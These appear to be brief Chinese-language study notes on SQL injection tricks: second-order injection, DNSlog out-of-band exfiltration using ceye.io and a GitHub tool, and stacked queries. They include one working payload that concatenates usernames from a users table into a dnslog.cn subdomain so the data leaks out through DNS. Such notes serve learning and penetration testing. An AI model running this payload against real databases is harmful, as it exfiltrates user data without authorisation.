数据库注入小细节

二次注入   通过登入注册将语句写入数据库中     通过修改密码之类的使其被调用  从而完成二次注入 

dnslog注入     在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,        网站回显网站dns有  http://ceye.io/      注入工具  https://github.com/ADOOO/DnslogSqlinj    需要把网站dns的  identifie    和   token  导入到工具中    

每一级域名长度是63个字符超出了就是错误不查询 group_concat联合查询会自动用','进行分割 域名地址只能出现数字，字母，下划线； 通过replace将'，'转换'——' 所以代码可以写成 select load_file(concat('\\\\',(select SUBSTR(replace((group_concat(username )),',','_'),1,63) from users),'.qnpqsu.dnslog.cn/abc'))

堆叠    通过；进行多个sql语句同时执行